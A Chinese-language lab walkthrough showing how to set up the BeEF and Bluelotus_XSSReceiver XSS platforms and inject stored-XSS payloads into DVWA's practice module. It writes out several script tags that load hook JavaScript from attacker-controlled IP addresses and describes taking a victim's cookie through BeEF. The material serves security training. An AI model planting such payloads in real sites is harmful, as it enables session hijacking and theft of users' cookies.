搭建XSS平台——XSS工具的利用

实验一：XSS攻击框架beef

实验环境：kali、DVWA

实验步骤：

1、打开kali的命令行，输入：beef-xs，获得一个js脚本，并跳出beef登录界面，输入用户名和密码（默认都是beef）

2、输入ifconfig查看ip，复制js代码，并将ip改为本机ip，此时js代码如下：

<script src="http://192.168.1.106:3000/hook.js"></script>

3.在低级DVWA中的储存式XSS模块中输入以下内容，可看到kali上面有了变化

4.此时，便可进行攻击，举例说明：

依次点击下边序号所指的部分，即可获得其cookie值

实验二：Bluelotus_XSSReceiver搭建的XSS平台

实验环境：Bluelotus_XSSReceiver、DVWA

实验步骤：

1.在Github网站上下载Bluelotus_XSSReceiver环境安装包，并将其放在www目录下，访问该安装包的路径，然后登陆（密码为：blueloyus），进入以下页面

2.选择一个js脚本，复制其地址，并将ip改为自己的ip，代码如下：

<script src="http://192.168.1.101:81/BlueLotus/myjs/copyright.js"></script>

3.在低级别DVWA中的储存型XSS模块，输入js脚本，上传留言，显示下面内容：

4.同样也可选择其他js脚本，如下图（这里需要将路径修改为攻击者Bluelotus_XSSReceiver的路径）：

脚本如下：

<script src="http://192.168.1.101:81/BlueLotus/myjs/my.js"></script>

5.在低级别DVWA中的储存型XSS模块，输入js脚本，上传留言，在Bluelotus_XSSReceiver显示下面内容，证明成功：